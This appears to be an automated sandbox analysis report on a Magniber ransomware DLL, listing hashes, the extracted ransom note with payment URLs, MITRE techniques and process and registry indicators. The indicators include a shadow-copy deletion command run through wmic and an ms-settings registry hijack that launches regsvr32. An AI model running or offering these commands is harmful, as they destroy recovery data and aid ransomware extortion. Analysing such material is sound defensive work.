magniber | 27ccf224a002dfa52b238c36b894991ca8f0b40c0741383c56fa4c31dbdd5cba

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
12-10-2024 00:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

377ea8e8c63f2b19b07c69492e99f3d8_JaffaCakes118.dll
Size

20KB
MD5

377ea8e8c63f2b19b07c69492e99f3d8
SHA1

dbe31e03e08116a69e435b4e083722a9745e54bc
SHA256

27ccf224a002dfa52b238c36b894991ca8f0b40c0741383c56fa4c31dbdd5cba
SHA512

c90414add29ad621923d38bdc3464295525ad884e64d9686a092a80e829f35692e1fdadd0e925539c0e0151f476d70860f48cc6a60504243eb3d96190431f87c
SSDEEP

384:KGAfHlDSTBkbMlSykOMIPSo0RsClrRjp1Sw6knL7ZcnA6AcIdrVpXsx45Xwpo:SfFAqbMlSykOnN0RsOFp1Sw6oKAjcIdj

Score

10^/10

magniber defense_evasion discovery execution impact ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://8224c89032284020bcqbvpseec.m647u2xsjtlfyzuevlxjiiwjsg2btyhmbxbjz4in4hm76u6hjzc62wad.onion/qbvpseec Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://8224c89032284020bcqbvpseec.gosmark.space/qbvpseec http://8224c89032284020bcqbvpseec.ourunit.xyz/qbvpseec http://8224c89032284020bcqbvpseec.topsaid.site/qbvpseec http://8224c89032284020bcqbvpseec.iecard.top/qbvpseec Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://8224c89032284020bcqbvpseec.m647u2xsjtlfyzuevlxjiiwjsg2btyhmbxbjz4in4hm76u6hjzc62wad.onion/qbvpseec

http://8224c89032284020bcqbvpseec.gosmark.space/qbvpseec

http://8224c89032284020bcqbvpseec.ourunit.xyz/qbvpseec

http://8224c89032284020bcqbvpseec.topsaid.site/qbvpseec

http://8224c89032284020bcqbvpseec.iecard.top/qbvpseec

Signatures

Detect magniber ransomware 1 IoCs

resource	yara_rule
behavioral2/memory/2164-0-0x000001DAA7540000-0x000001DAA7A7E000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 50 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3280	3240	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2396	3240	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1568	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1904	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1704	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5132	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5180	3240	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5160	3240	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5600	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5700	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5644	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5596	3240	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5656	3240	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5896	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2284	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5180	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5188	3240	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5648	3240	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5836	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6012	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5160	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5556	3240	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5724	3240	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5564	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5628	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	432	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5784	3240	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4292	3240	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5984	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4120	3240	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5932	3240	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1140	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5528	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4888	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	840	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5816	3240	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4088	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	888	3240	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5720	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5240	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1612	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5832	3240	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5288	3240	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5596	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5468	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4588	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3204	3240	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5684	3240	cmd.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3944	3240	vssadmin.exe	98
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1328	3240	vssadmin.exe	98

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Renames multiple (64) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Suspicious use of SetThreadContext 14 IoCs

description	pid	Process	procid_target
PID 2164 set thread context of 2616	2164	rundll32.exe	44
PID 2164 set thread context of 2652	2164	rundll32.exe	45
PID 2164 set thread context of 2824	2164	rundll32.exe	48
PID 2164 set thread context of 3596	2164	rundll32.exe	56
PID 2164 set thread context of 3732	2164	rundll32.exe	57
PID 2164 set thread context of 3920	2164	rundll32.exe	58
PID 2164 set thread context of 4012	2164	rundll32.exe	59
PID 2164 set thread context of 4076	2164	rundll32.exe	60
PID 2164 set thread context of 692	2164	rundll32.exe	61
PID 2164 set thread context of 4136	2164	rundll32.exe	62
PID 2164 set thread context of 3296	2164	rundll32.exe	74
PID 2164 set thread context of 3800	2164	rundll32.exe	76
PID 2164 set thread context of 3108	2164	rundll32.exe	80
PID 2164 set thread context of 4964	2164	rundll32.exe	81

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	backgroundTaskHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	backgroundTaskHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	backgroundTaskHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	backgroundTaskHost.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Interacts with shadow copies 3 TTPs 30 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
5836	vssadmin.exe
1904	vssadmin.exe
1704	vssadmin.exe
5600	vssadmin.exe
5644	vssadmin.exe
5564	vssadmin.exe
2284	vssadmin.exe
4888	vssadmin.exe
5240	vssadmin.exe
4588	vssadmin.exe
5700	vssadmin.exe
5528	vssadmin.exe
1328	vssadmin.exe
6012	vssadmin.exe
5160	vssadmin.exe
5628	vssadmin.exe
5720	vssadmin.exe
1568	vssadmin.exe
3944	vssadmin.exe
5132	vssadmin.exe
5180	vssadmin.exe
5984	vssadmin.exe
1140	vssadmin.exe
4088	vssadmin.exe
1612	vssadmin.exe
5896	vssadmin.exe
432	vssadmin.exe
840	vssadmin.exe
5596	vssadmin.exe
5468	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Explorer.EXE

Modifies registry class 53 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	backgroundTaskHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	DllHost.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	backgroundTaskHost.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1"	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command	DllHost.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command	TextInputHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	DllHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	DllHost.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\MuiCache	backgroundTaskHost.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	backgroundTaskHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\ms-settings\shell\open	svchost.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
4228	notepad.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2164	rundll32.exe
2164	rundll32.exe
2788	msedge.exe
2788	msedge.exe
1108	msedge.exe
1108	msedge.exe
5400	identity_helper.exe
5400	identity_helper.exe
2100	msedge.exe
2100	msedge.exe
2100	msedge.exe
2100	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3596	Explorer.EXE
2824	taskhostw.exe

Suspicious behavior: MapViewOfSection 14 IoCs

pid	Process
2164	rundll32.exe
2164	rundll32.exe
2164	rundll32.exe
2164	rundll32.exe
2164	rundll32.exe
2164	rundll32.exe
2164	rundll32.exe
2164	rundll32.exe
2164	rundll32.exe
2164	rundll32.exe
2164	rundll32.exe
2164	rundll32.exe
2164	rundll32.exe
2164	rundll32.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3596	Explorer.EXE
Token: SeCreatePagefilePrivilege	3596	Explorer.EXE
Token: SeShutdownPrivilege	3596	Explorer.EXE
Token: SeCreatePagefilePrivilege	3596	Explorer.EXE
Token: SeShutdownPrivilege	3596	Explorer.EXE
Token: SeCreatePagefilePrivilege	3596	Explorer.EXE
Token: SeShutdownPrivilege	3596	Explorer.EXE
Token: SeCreatePagefilePrivilege	3596	Explorer.EXE
Token: SeShutdownPrivilege	3596	Explorer.EXE
Token: SeCreatePagefilePrivilege	3596	Explorer.EXE
Token: SeShutdownPrivilege	3596	Explorer.EXE
Token: SeCreatePagefilePrivilege	3596	Explorer.EXE
Token: SeShutdownPrivilege	3596	Explorer.EXE
Token: SeCreatePagefilePrivilege	3596	Explorer.EXE
Token: SeShutdownPrivilege	3596	Explorer.EXE
Token: SeCreatePagefilePrivilege	3596	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	436	wmic.exe
Token: SeSecurityPrivilege	436	wmic.exe
Token: SeTakeOwnershipPrivilege	436	wmic.exe
Token: SeLoadDriverPrivilege	436	wmic.exe
Token: SeSystemProfilePrivilege	436	wmic.exe
Token: SeSystemtimePrivilege	436	wmic.exe
Token: SeProfSingleProcessPrivilege	436	wmic.exe
Token: SeIncBasePriorityPrivilege	436	wmic.exe
Token: SeCreatePagefilePrivilege	436	wmic.exe
Token: SeBackupPrivilege	436	wmic.exe
Token: SeRestorePrivilege	436	wmic.exe
Token: SeShutdownPrivilege	436	wmic.exe
Token: SeDebugPrivilege	436	wmic.exe
Token: SeSystemEnvironmentPrivilege	436	wmic.exe
Token: SeRemoteShutdownPrivilege	436	wmic.exe
Token: SeUndockPrivilege	436	wmic.exe
Token: SeManageVolumePrivilege	436	wmic.exe
Token: 33	436	wmic.exe
Token: 34	436	wmic.exe
Token: 35	436	wmic.exe
Token: 36	436	wmic.exe
Token: SeIncreaseQuotaPrivilege	4648	WMIC.exe
Token: SeSecurityPrivilege	4648	WMIC.exe
Token: SeTakeOwnershipPrivilege	4648	WMIC.exe
Token: SeLoadDriverPrivilege	4648	WMIC.exe
Token: SeSystemProfilePrivilege	4648	WMIC.exe
Token: SeSystemtimePrivilege	4648	WMIC.exe
Token: SeProfSingleProcessPrivilege	4648	WMIC.exe
Token: SeIncBasePriorityPrivilege	4648	WMIC.exe
Token: SeCreatePagefilePrivilege	4648	WMIC.exe
Token: SeBackupPrivilege	4648	WMIC.exe
Token: SeRestorePrivilege	4648	WMIC.exe
Token: SeShutdownPrivilege	4648	WMIC.exe
Token: SeDebugPrivilege	4648	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4648	WMIC.exe
Token: SeRemoteShutdownPrivilege	4648	WMIC.exe
Token: SeUndockPrivilege	4648	WMIC.exe
Token: SeManageVolumePrivilege	4648	WMIC.exe
Token: 33	4648	WMIC.exe
Token: 34	4648	WMIC.exe
Token: 35	4648	WMIC.exe
Token: 36	4648	WMIC.exe
Token: SeIncreaseQuotaPrivilege	436	wmic.exe
Token: SeSecurityPrivilege	436	wmic.exe
Token: SeTakeOwnershipPrivilege	436	wmic.exe
Token: SeLoadDriverPrivilege	436	wmic.exe
Token: SeSystemProfilePrivilege	436	wmic.exe
Token: SeSystemtimePrivilege	436	wmic.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
3596	Explorer.EXE
3596	Explorer.EXE

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe
1108	msedge.exe

Suspicious use of UnmapMainImage 4 IoCs

pid	Process
4136	RuntimeBroker.exe
3800	RuntimeBroker.exe
4012	StartMenuExperienceHost.exe
4076	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2652 wrote to memory of 4228	2652	svchost.exe	86
PID 2652 wrote to memory of 4228	2652	svchost.exe	86
PID 2652 wrote to memory of 3812	2652	svchost.exe	87
PID 2652 wrote to memory of 3812	2652	svchost.exe	87
PID 2652 wrote to memory of 436	2652	svchost.exe	88
PID 2652 wrote to memory of 436	2652	svchost.exe	88
PID 2652 wrote to memory of 1404	2652	svchost.exe	89
PID 2652 wrote to memory of 1404	2652	svchost.exe	89
PID 2652 wrote to memory of 2264	2652	svchost.exe	90
PID 2652 wrote to memory of 2264	2652	svchost.exe	90
PID 2264 wrote to memory of 4648	2264	cmd.exe	96
PID 2264 wrote to memory of 4648	2264	cmd.exe	96
PID 1404 wrote to memory of 1588	1404	cmd.exe	97
PID 1404 wrote to memory of 1588	1404	cmd.exe	97
PID 2396 wrote to memory of 748	2396	cmd.exe	127
PID 2396 wrote to memory of 748	2396	cmd.exe	127
PID 3280 wrote to memory of 2472	3280	cmd.exe	106
PID 3280 wrote to memory of 2472	3280	cmd.exe	106
PID 3812 wrote to memory of 1108	3812	cmd.exe	109
PID 3812 wrote to memory of 1108	3812	cmd.exe	109
PID 1108 wrote to memory of 1344	1108	msedge.exe	111
PID 1108 wrote to memory of 1344	1108	msedge.exe	111
PID 748 wrote to memory of 1088	748	ComputerDefaults.exe	112
PID 748 wrote to memory of 1088	748	ComputerDefaults.exe	112
PID 2472 wrote to memory of 4860	2472	ComputerDefaults.exe	114
